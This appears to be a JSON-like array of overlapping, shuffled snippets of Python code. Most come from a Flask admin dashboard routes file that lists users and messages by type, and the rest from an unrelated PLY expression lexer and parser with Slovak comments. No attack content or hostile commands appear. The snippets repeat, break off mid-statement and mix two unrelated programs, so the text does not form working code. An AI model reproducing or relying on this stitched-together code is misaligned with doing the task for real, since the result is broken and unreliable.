"num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs)",
"@app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def",
"if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else:",
"#Libs from flask import Flask, g, redirect, render_template, request, url_for, session, flash from",
"# if task.state == \"current\": # current.append(task) # elif task.state == \"completed\": #",
"or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return",
"#return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):#",
"db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users():",
"or_ #Modules from flask_app import db, app from models import User, Msg import",
"# deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\")",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported",
"User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users():",
"decorated_function(): if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin",
"all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #-->",
"db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users():",
"!= \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user =",
"#!interpreter [optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\"",
"ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import db, app",
"dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\")",
"num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user",
"# for msg in msgs: # if msg.current == True: # return msg",
"@app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in",
"== \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important,",
"Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task",
"else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@",
"get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#,",
"users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\"",
"#current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg",
"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\")",
"import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import",
"@admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg()",
"users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required",
"users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title",
"\"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return",
"def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"\"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return",
"#get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg:",
"def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user",
"users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\"",
"######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required",
"-*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime",
"def decorated_function(): if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\"))",
"def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the",
"functools import wraps #for some reason I need to also import all from",
"in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return",
"user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users():",
"msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs",
"return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title",
"user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs,",
"index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or",
"return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\")",
"[] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\",",
"msg in msgs: # if msg.current == True: # return msg # return",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required",
"not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html',",
"all from list from msg_routes import * from user_routes import * #needs to",
"admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in session:",
"sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with",
"num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html',",
"db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the",
"it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not",
"current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for",
"import db, app from models import User, Msg import msg_routes, user_routes from functools",
"all from each of these. #especially list_routes for find all from list from",
"I need to also import all from each of these. #especially list_routes for",
"#find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs:",
"# else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs,",
"def dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if",
"Boolean ) from sqlalchemy import or_ #Modules from flask_app import db, app from",
"def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs,",
"#current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the",
"Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules",
"need to also import all from each of these. #especially list_routes for find",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def",
"= Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for",
"user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def",
"title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\")",
"title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return",
"user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title =",
"from sqlalchemy import or_ #Modules from flask_app import db, app from models import",
"user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg",
"* #needs to be above all functions that use it??? def admin_login_required(f): @wraps(f)",
"db, app from models import User, Msg import msg_routes, user_routes from functools import",
"@app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return",
"db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the",
"msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed,",
"#x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\": #",
"@app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\")",
"title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return",
"from models import User, Msg import msg_routes, user_routes from functools import wraps #for",
"also import all from each of these. #especially list_routes for find all from",
"not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f()",
"= db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ########################################################################################",
"users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\"",
"the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs)",
"import * #needs to be above all functions that use it??? def admin_login_required(f):",
"models import User, Msg import msg_routes, user_routes from functools import wraps #for some",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user",
"= user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\")",
"msg_routes, user_routes from functools import wraps #for some reason I need to also",
"# completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return",
"g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy",
"dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get",
"find all from list from msg_routes import * from user_routes import * #needs",
"request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table,",
"== \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) # else:",
"None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id'",
"render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# #",
"#def find_current_msg(msgs):# # for msg in msgs: # if msg.current == True: #",
"= db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def",
"# \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import",
"= find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs",
"if task.state == \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task)",
"-*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask",
"= db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users =",
"return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs,",
"some reason I need to also import all from each of these. #especially",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium",
"title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users",
"\"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: #",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title",
"render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def",
"x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def",
"* from user_routes import * #needs to be above all functions that use",
"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users",
"render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg",
"@app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html',",
"num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not",
"import wraps #for some reason I need to also import all from each",
"\"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value))",
"def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html',"
] |
[
"p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 | '*' x",
"inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho",
"'''inp : exp '>' exp | exp '<' exp | exp GRE exp",
"reset flagu return False if not tok: break # syntakticka kontrola parser.parse(expression) if",
"definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', )",
"= '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def",
"premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" %",
"ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie",
"NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING | x",
"= '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value",
"pridanie fieldu do listu fieldov # ak chyba v gramatike vypise sa chyba,",
"'''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2",
"= int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" %",
"parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak",
"'*' x exp2 | '/' x exp2 | ''' def p_x1(p): '''x :",
"chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru",
"True # funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri",
"# ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na",
"break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False",
"exp2 | '*' x exp2 | '/' x exp2 | ''' def p_x1(p):",
"# vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True",
"suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: #",
"if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba",
"'%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror =",
"exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 |",
"literaly literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD",
"= lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu",
"# chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True",
"global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v gramatike vypise",
"'*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"'",
"# funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej",
"lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex()",
"global_var.parseerror = False # reset flagu return False if not tok: break #",
"funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo",
"exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING |",
"NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov",
"zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe",
"''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) #",
"vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer",
"parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return",
"| '-' x exp2 | '*' x exp2 | '/' x exp2 |",
"vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if",
"FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v gramatike",
"p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba",
"x exp2 | '-' x exp2 | '*' x exp2 | '/' x",
"= True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na",
"exp2 | '/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def",
"( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals =",
"tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) #",
"znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp",
"v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def",
"vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if",
"chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\")",
"tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly",
"lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati",
"lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror =",
"yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE',",
"print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p):",
"'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>', '<']",
"as lex import ply.yacc as yacc import global_var # definicie tokenov tokens =",
"False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak",
"'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-',",
"p_inp(p): '''inp : exp '>' exp | exp '<' exp | exp GRE",
"exp '<' exp | exp GRE exp | exp LOE exp | exp",
"# gramatika def p_inp(p): '''inp : exp '>' exp | exp '<' exp",
"True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp | exp",
"def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+'",
"chyba global_var.parseerror = False # reset flagu return False if not tok: break",
"= r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ =",
"parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True:",
"'-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING =",
"gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p):",
"if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka",
"int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0])",
"'''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do",
"# kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak",
"'<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t):",
"GRE exp | exp LOE exp | exp NEQ exp | exp EQ",
"x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x :",
"'%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp :",
"def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov #",
"'/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x",
"# ak chyba global_var.parseerror = False # reset flagu return False if not",
"t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t #",
"r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak",
"LOE exp | exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp",
"= False # reset flagu return False if not tok: break # syntakticka",
": exp '>' exp | exp '<' exp | exp GRE exp |",
"chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka",
"= True # funkcia na zostavenie lexemu a parseru # vstupom je vyraz,",
"tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<='",
"globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\"",
"\" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token",
"= lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression)",
"ply.lex as lex import ply.yacc as yacc import global_var # definicie tokenov tokens",
"= \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny",
"| exp '<' exp | exp GRE exp | exp LOE exp |",
"'-' x exp2 | '*' x exp2 | '/' x exp2 | '''",
"vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def",
"'>' exp | exp '<' exp | exp GRE exp | exp LOE",
"| exp GRE exp | exp LOE exp | exp NEQ exp |",
"je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression):",
"chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False)",
": FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v",
"exp '>' exp | exp '<' exp | exp GRE exp | exp",
"def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True",
"import ply.lex as lex import ply.yacc as yacc import global_var # definicie tokenov",
"as yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD',",
"# popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE",
"def p_inp(p): '''inp : exp '>' exp | exp '<' exp | exp",
"sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri",
"tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror =",
"t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ",
"global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ',",
"'/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE",
"exp GRE exp | exp LOE exp | exp NEQ exp | exp",
"kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu",
